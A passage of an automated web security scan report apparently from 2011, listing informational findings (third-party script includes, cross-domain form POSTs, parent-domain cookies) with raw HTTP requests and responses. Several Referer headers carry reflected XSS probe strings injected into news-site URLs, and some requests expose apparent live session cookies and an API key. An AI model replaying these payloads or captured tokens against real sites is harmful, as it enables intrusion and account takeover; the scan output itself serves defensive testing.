document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D86400"></scr'+'ipt>');

Request 2

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:46 GMT
Content-Length: 395

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D86400"></scr'+'ipt>');

8.2. http://www.examiner.com/sites/all/modules/custom/pajito/widget/content/widget.js.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.examiner.com
Path:   /sites/all/modules/custom/pajito/widget/content/widget.js.php

Request 1

GET /sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:48:21 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-WebNode: web8.b.examiner.com
Content-Length: 4694

(function (window, document) {
var sScript = 'script',
sIframe = 'iframe',
scriptId = 'examiner-pajita',
rHash = /^([^#]+)#(.*)$/,
/* examiner.com hosting content*/
contentURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/pajito-block.js.php?proxy=http%3A%2F%2Fwww.nowpublic.com%2FexaminerContainerProxy.html&partner=nowpublic",
/* Proxy path */
proxyURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/widget\/content\/contentProxy.php",
contentIframe,
proxyIframe,
hop = Object.prototype.hasOwnProperty,
unesc = window.decodeURIComponent,
esc = window.encodeURIComponent,
postMessage = 'postMessage',
canPost = typeof window[postMessage] == 'function',
targetOrigin = canPost && contentURI.match(/^http:\/\/[^\/]+/)[0],
setAttributes = function (attributes) {
var p;

for (p in attributes) {
if (hop.call(attributes, p)) {
this.setAttribute(p, attributes[p]);
}
}
},
addEvent = function (elm, evt, func) {
var f = function (event) {
var target;

if (!event) { event = window.event; }
if (event.target) { target = event.target; }
else if (event.srcElement) { target = event.srcElement; }
if (target && target.nodeType == 3) { target = target.parentNode; }

return func.apply(target, arguments);
};

if (elm.addEventListener) {
elm.addEventListener(evt, f, false);
}
else if (elm.attachEvent) {
elm.attachEvent(('on' + evt), f);
}
else {
elm['on' + evt] = f;
}
},
parseParameters = function (message) {
var items = {},
pairs = message.split(/&/),
pl = pairs.length,
i = 0,
value;

for (; i < pl; i += 1) {
value = pairs[i].split(/[=]/);
items[unesc(value[0])] = unesc(value[1]);
}

return items;
},
escapeParameters = function (data) {
var message = [],
p;

for (p in data) {
if (hop.call(data, p)) {
message.push(esc(p) + '=' +
...[SNIP]...

Request 2

GET /sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:48:50 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-WebNode: web10.b.examiner.com
Content-Length: 4751

(function (window, document) {
var sScript = 'script',
sIframe = 'iframe',
scriptId = 'examiner-pajita',
rHash = /^([^#]+)#(.*)$/,
/* examiner.com hosting content*/
contentURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/pajito-block.js.php?proxy=http%3A%2F%2Fwww.examiner.com%2Fsites%2Fall%2Fmodules%2Fcustom%2Fpajito%2Fwidget%2Fhost%2FexaminerContainerProxy.html&partner=nowpublic",
/* Proxy path */
proxyURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/widget\/content\/contentProxy.php",
contentIframe,
proxyIframe,
hop = Object.prototype.hasOwnProperty,
unesc = window.decodeURIComponent,
esc = window.encodeURIComponent,
postMessage = 'postMessage',
canPost = typeof window[postMessage] == 'function',
targetOrigin = canPost && contentURI.match(/^http:\/\/[^\/]+/)[0],
setAttributes = function (attributes) {
var p;

for (p in attributes) {
if (hop.call(attributes, p)) {
this.setAttribute(p, attributes[p]);
}
}
},
addEvent = function (elm, evt, func) {
var f = function (event) {
var target;

if (!event) { event = window.event; }
if (event.target) { target = event.target; }
else if (event.srcElement) { target = event.srcElement; }
if (target && target.nodeType == 3) { target = target.parentNode; }

return func.apply(target, arguments);
};

if (elm.addEventListener) {
elm.addEventListener(evt, f, false);
}
else if (elm.attachEvent) {
elm.attachEvent(('on' + evt), f);
}
else {
elm['on' + evt] = f;
}
},
parseParameters = function (message) {
var items = {},
pairs = message.split(/&/),
pl = pairs.length,
i = 0,
value;

for (; i < pl; i += 1) {
value = pairs[i].split(/[=]/);
items[unesc(value[0])] = unesc(value[1]);
}

return items;
},
escapeParameters = function (data) {
var message = [],
p;

for (p in data) {
if (hop
...[SNIP]...

9. Cross-domain POST
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://savannahnow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain clicks.skem1.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:43:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:48:52 GMT
Last-Modified: Mon, 12 Sep 2011 12:43:52 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831432"-gzip
Vary: Accept-Encoding
Content-Length: 149668
Content-Type: text/html; charset=utf-8
Age: 273
X-Cache: HIT from sms3.morris.com
X-Cache-Lookup: HIT from sms3.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<td style="width:200px; padding:4px 0px 0px 0px; margin:0px 0px 0px 0px;">
<form accept-charset="UTF-8" name="IBNSubscribe" action="http://clicks.skem1.com/signup/" method="POST" target="_blank">
<input name="c" value="2891" type="hidden">
...[SNIP]...

9.2. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The page contains a form which POSTs data to the domain clicks.skem1.com. The form contains the following fields:

Request

GET /sites/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zvents_tracker_sid=13158497232050.9525420391000807; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=222803225.1251345904.1315849732.1315849732.1315849732.1; __utmb=222803225.4.10.1315849732; __utmc=222803225; __utmz=222803225.1315849732.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; bd-local=fb-id=1B3C6937-8DDC-4B7E-95C5-7878A957141E; _chartbeat2=mu28j07dwufmztf2.1315849749723; iePersistentData_Pencil_Expand_New_129534=1

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 12:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:04:58 GMT
Last-Modified: Mon, 12 Sep 2011 12:59:58 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832398"-gzip
Vary: Accept-Encoding
Content-Length: 79084
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<td style="width:200px; padding:4px 0px 0px 0px; margin:0px 0px 0px 0px;">
<form accept-charset="UTF-8" name="IBNSubscribe" action="http://clicks.skem1.com/signup/" method="POST" target="_blank">
<input name="c" value="2891" type="hidden">
...[SNIP]...

9.3. http://www.popsci.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain popularscience.bonniersubscriptions.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: web4f D=18707
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
cache-control: max-age = 300
Content-Length: 116217
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744016 1570730120
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 87

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
</div>
<form action="https://popularscience.bonniersubscriptions.com/HAG0-005/" method="post">
<div id="fields">
...[SNIP]...

10. Cookie scoped to parent domain
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fc14.zedo.com%2FOzoDB%2Fcutils%2FR53_7_7%2Fjsc%2F1545%2Fzpu.html%3Fn%3D1545%3Bf%3D1%3Bz%3D2-110&f=2&p=9679837&a=1&rnd=9678783 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 09-Sep-2021 12:49:41 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1213154547 = new Image();\r\n tfimg1213154547.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=0";\r\n})();\r\n<\/sc
...[SNIP]...

10.2. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

10.3. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 12 Sep 2011 13:06:08 GMT
Location: http://dts1.raasnet.com/dts/bizo/in?industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXM6UUqwNaQIaj5XcunNcMDa7Re6IGD4lJwvYvTFPJeCAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDekIwbdwzisbvEVUJBxdqAyBFiiNVUlT95AiiktrG07sTpWxGp85dzvukEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


10.4. http://apis.google.com/js/plusone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk;Domain=.google.com;Path=/;Expires=Thu, 09-Sep-2021 13:04:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 12 Sep 2011 13:04:27 GMT
Date: Mon, 12 Sep 2011 13:04:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5398

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

10.5. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=172392041&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.dome9.com%252F%26jsref%3D%26rnd%3D1315849265708&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.dome9.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 12 Sep 2011 12:40:56 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 11-Sep-2013 12:40:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.6. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
